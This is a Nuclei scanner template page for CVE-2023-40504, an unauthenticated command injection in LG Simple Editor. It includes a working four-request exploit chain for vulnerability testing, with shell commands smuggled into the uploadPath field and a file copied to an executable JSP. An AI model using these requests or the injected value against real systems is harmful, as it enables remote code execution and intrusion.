Skip to content
Nuclei Templates

LG Simple Editor <= v3.21.0 - Command Injection

ID: CVE-2023-40504

Severity: critical

Author: s4e-io

Tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload

Description

Section titled “Description”

LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.

YAML Source

Section titled “YAML Source”
id: CVE-2023-40504
info:
  name: LG Simple Editor <= v3.21.0 - Command Injection
  author: s4e-io
  severity: critical
  description: |
    LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
    - https://packetstormsecurity.com/files/180171/LG-Simple-Editor-3.21.0-Command-Injection.html
    - https://0day.today/exploit/39719
    - https://www.usom.gov.tr/bildirim/tr-24-0417
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40504
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-40504
    cwe-id: CWE-78
    epss-score: 0.00094
    epss-percentile: 0.40471
  metadata:
    max-request: 1
    verified: true
    vendor: lg
    product: simple_editor
    fofa-query: icon_hash="159985907"
  tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload


variables:
  filename: "{{rand_base(12)}}"


flow: http(1) && http(2) && http(3) && http(4)


http:
  - raw:
      - |
        GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"LG Simple Editor")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW


        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadVideo"; filename="{{filename}}.bmp"


        /
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadPath"


        /"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../"
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_x"


        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_width"


        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_height"


        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "errorCode","errorMessage","fail")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json


        {"command":"cp","option":"-f","srcPath":"/{{filename}}_original.bmp","destPath":"/{{filename}}.jsp"}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "errorCode","errorMessage","data","success")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        GET /simpleeditor/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502203240b6c93134bd44a43df9a98ddd9c808046a1d4538f2ba5adc3b88a1aada97c022100dd817fe4edcb16768f8b4d9ac47ed8aa18102392c51b863a7835b582bb324b44:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-40504.yaml"

View on Github